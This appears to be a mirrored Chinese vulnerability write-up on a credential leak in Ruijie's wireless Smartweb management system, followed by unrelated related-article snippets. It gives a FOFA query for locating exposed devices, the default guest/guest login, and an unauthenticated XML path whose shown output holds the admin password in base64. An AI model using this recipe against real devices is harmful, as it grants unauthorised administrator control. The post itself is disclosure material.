锐捷 Smartweb管理系统 密码信息泄露漏洞

news/2024/11/7 16:54:13/

漏洞描述

i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

漏洞影响

s ✅锐捷网络股份有限公司 无线smartweb管理系统

空间测绘

d ⭕FOFA:title="无线smartWeb--登录页面"

漏洞复现

  • ✅访问首页,存在账号guest/guest登陆

image-20220410150054904

  • 而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到

image-20220410150612702

  • 访问未授权路径/web/xml/webuser-auth.xml
<userauth>
<user>
<name>
<![CDATA[ admin ]]>
</name>
<password>
<![CDATA[ YWRtaW46cXNsYmJzaHlj ]]>
</password>
<page>all</page>
<level>0</level>
<favorites>
<![CDATA[ ]]>
</favorites>
</user>

image-20220410150812679

个人博客

孤桜懶契:https://gylq.gitee.io/time


http://www.ppmy.cn/news/911186.html

相关文章

收银系统源码演示-适合超市便利店零售等行业

一、适合超市、便利店等零售行业的收银系统源码的平台架构 桌面端&#xff1a;PC管理后台、PC网页收银、Windows桌面收银、安卓桌面收银、MAC桌面收银移动端&#xff1a;安卓桌面收银、安卓自助收银、安卓商家助手APP微信端&#xff1a;微信小程序商家助手、微信小程序网店Pad…

APB/AHB/AXI总线介绍和理解

APB/AHB/AXI总线介绍&#xff1a; APB/AHB/AXI均属于AMBA (Advanced Microcontroller Bus Architecture)&#xff0c;常用于SoC设计中&#xff0c;全称叫作高级微控制器总线架构&#xff0c;它是由ARM公司研发推出的高性能片上总线协议。 AMBA 1.0还包含ASB和APB&#xff08;A…

Spring Batch之读数据库——JdbcCursorItemReader之使用框架提供的BeanPropertyRowMapper(三十六)

一、BeanPropertyRowMapper介绍 参考我的另一篇博客&#xff1a; Spring Batch之读数据库——JdbcCursorItemReader&#xff08;三十五&#xff09;_人……杰的博客-CSDN博客 二、项目实例 1.项目框架 2.代码实现 BatchMain.java: package com.xj.demo27;import org.spri…

幸福摩天轮

他们相约的城市&#xff0c;有美丽的世界之窗。 她想&#xff0c;那里一定有很大很大的摩天轮。 有一天&#xff0c;她会和他坐上这摩天轮&#xff0c;一起走完全程。 她心里一直有隐隐的不安&#xff0c;只是&#xff0c;她知道&#xff0c;即使是受伤&#xff0c;也要爱。 …

H5实现摩天轮

代码&#xff1a; html:css效果 <head><meta charset"utf-8" /><title>幸福摩天轮</title><link rel"stylesheet" href"css/mtl.css" /> </head> <body><div><ul><li></li&g…

摩天大树问题

一 问题描述 有一棵摩天大树&#xff0c;在树的每个分支节点上都有一个整数&#xff0c;可否在树上找到这样一个链&#xff0c;以便链上所有整数的乘积&#xff08;mod 10^63&#xff09;都等于k &#xff1f; 二 输入和输出 1 输入 输入包含几个测试用例。每个测试用例的第…

前端摩天轮效果实现,鼠标移入停止,移出继续转动。

最近实现了摩天轮的效果&#xff0c;记录下实现原理与过程&#xff0c;备忘&#xff0c;分享。 兼容性不高&#xff0c;IE10,11,Chrome41。 360浏览器(急速模式会有卡顿的感觉) 使用css3js控制了摩天轮旋转&#xff0c;以及鼠标移入移出的停止动画的效果 原理:css3中有旋转的特…

css33d摩天轮动画

摩天轮代码 <!DOCTYPE html> <html><head><meta charset"UTF-8"><title></title><style>*{margin: 0;padding: 0;}html,body{height:100%;}body{background: url("img3/2.jpg")no-repeat;background-size:100%…